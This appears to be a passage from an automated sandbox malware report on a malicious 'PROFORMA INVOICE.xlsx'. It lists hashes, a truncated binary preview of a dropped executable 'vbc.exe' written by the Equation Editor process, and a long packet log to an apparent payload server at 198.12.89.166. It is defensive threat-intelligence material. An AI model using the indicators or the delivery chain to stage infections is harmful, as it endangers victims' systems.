MD5:	F7ECD12D134AAF3541396C78337CE672
SHA1:	BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
SHA-256:	EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
SHA-512:	EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......F.(........(.......(..........(..........(........{...."..}....&.(......F.(........(.......(..........(..........(........0...........(.....o......o.....+...0...........(.....o......o.....+...0...........(.....o.......o.....+......0...........(.....o.......o.....+......0.. ........(.....o.......o......o$....+...0.. ........(.....o.......o......o$....+...(....o.....(....o....

C:\Users\user\Desktop\~$PROFORMA INVOICE.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Reputation:	unknown
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	731648
Entropy (8bit):	7.625561793309267
Encrypted:	false
SSDEEP:	12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
MD5:	F7ECD12D134AAF3541396C78337CE672
SHA1:	BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
SHA-256:	EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
SHA-512:	EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......F.(........(.......(..........(..........(........{...."..}....&.(......F.(........(.......(..........(..........(........0...........(.....o......o.....+...0...........(.....o......o.....+...0...........(.....o.......o.....+......0...........(.....o.......o.....+......0.. ........(.....o.......o......o$....+...0.. ........(.....o.......o......o$....+...(....o.....(....o....

Static File Info

General

File type:	CDFV2 Encrypted
Entropy (8bit):	7.91695700296717
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	PROFORMA INVOICE.xlsx
File size:	95744
MD5:	5b9ddbdf0a0af0788eeceeacec2f0295
SHA1:	77687d59abbd0b3c4eecc80abbe30d33a47e781c
SHA256:	e11f7d510b899e00e0cf10dc360400fd38f180e9c72f42c465c3a470075cd9ea
SHA512:	1657e35379aa82abe0edd01da1cf97cb6bbabcde9788c2e7b433f12df627320f29a519a502d71e66b39a40cd5dd908594c907cd69eacbceab797bfac6085ccf7
SSDEEP:	1536:c3ir/an65WHrmE9mfKMkBIvMBMVMO9C9SpX5xhhgD7uJbbi+7MgFlUveeAM:cSW68Lm/fKMk6tHCWToIXi+/nTF
TLSH:	A493E080781E8C1CD8EABA3CA3555E66BB14DF308D6F8070EFBE78C910B7856D9D5126
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 15:10:55.284567118 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.399624109 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.399729967 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.400794983 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518570900 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518635035 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518676043 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518706083 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518713951 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518743038 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518749952 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518757105 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518769026 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518815041 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518822908 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518857956 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518878937 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518902063 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518910885 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518944979 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.518949986 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518989086 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.518989086 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.519037008 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.589246035 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632600069 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632638931 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632666111 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632689953 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632719040 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632745981 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632770061 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632795095 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632812977 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632819891 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632848024 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632852077 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632853985 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632858038 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632880926 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632882118 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632894039 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632908106 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632936001 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632936001 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632949114 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632962942 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632986069 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.632987022 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.632997990 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.633013010 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.633037090 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.633038044 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.633047104 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.633064985 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.633080959 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.633090019 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.633116007 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.633116007 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.633124113 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.633155107 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.637650013 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.746747971 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746808052 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746855021 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746886015 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746917963 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746943951 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746974945 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.746977091 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747009993 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747040033 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747040987 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747072935 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747104883 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747116089 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747131109 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747169018 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747172117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747200012 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747217894 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747234106 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747261047 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747263908 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747291088 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747319937 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747334003 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747349977 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747380972 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747402906 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747409105 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747438908 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747457981 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747471094 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747503996 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747520924 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747533083 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747566938 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747586966 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747596025 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747625113 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747647047 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747656107 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747683048 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747701883 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747713089 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747742891 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747762918 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747792959 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747801065 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747828007 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747859955 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747874022 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.747889996 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.747927904 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.748013973 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.751224995 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.751272917 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.751323938 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.751362085 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.751394987 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.751470089 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.766722918 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861555099 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861594915 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861618996 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861640930 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861664057 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861686945 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861711025 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861736059 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861759901 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861767054 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861784935 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861797094 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861799955 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861810923 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861818075 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861836910 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861846924 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861864090 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861874104 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861890078 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861896992 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861912966 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861923933 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861937046 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.861947060 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.861972094 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.872720003 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880515099 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880661964 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880675077 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880721092 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880727053 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880754948 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880776882 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880778074 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880800962 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880800962 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880825996 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880837917 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880850077 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880856037 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880873919 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880876064 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880889893 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880899906 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880924940 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880927086 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880937099 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880950928 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880973101 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.880973101 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880985022 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.880996943 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881019115 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881025076 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881042957 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881063938 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881064892 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881072044 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881087065 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881089926 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881102085 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881114006 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881130934 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881135941 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881149054 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881159067 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881172895 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881182909 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881189108 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881206036 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881216049 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881227970 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881239891 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881251097 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881263018 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881273985 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881285906 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881299019 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881311893 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881324053 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881328106 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881346941 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881357908 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881371021 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881383896 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881393909 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881397963 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881418943 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.881431103 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.881457090 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.883136988 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975708008 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.975775957 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.975780010 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975815058 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975820065 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.975857019 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975861073 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.975898981 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975903034 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.975939035 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975946903 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.975986004 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.975986958 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.976025105 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.976028919 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.976070881 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.986705065 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.986809969 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.986829042 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.986857891 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.986865997 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.986901999 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.986901999 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.986942053 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.986943007 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.986983061 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.986983061 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.987025023 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.987025023 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.987065077 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.987066984 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.987112045 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.995810986 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.995884895 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.995893955 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.995925903 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.995943069 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.995984077 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.995999098 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.996042013 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997579098 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.997663975 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.997690916 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997710943 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997726917 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.997770071 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997786999 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.997827053 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997847080 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.997888088 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997909069 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.997947931 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.997972012 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998011112 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998037100 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998080969 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998097897 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998136044 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998158932 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998198986 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998234987 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998276949 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998298883 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998337030 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998352051 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998393059 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998409986 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998450041 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998470068 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998512030 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998523951 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998564959 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998585939 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998626947 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998645067 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998686075 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:55.998703957 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:55.998745918 CEST	49173	80	192.168.2.22	198.12.89.166
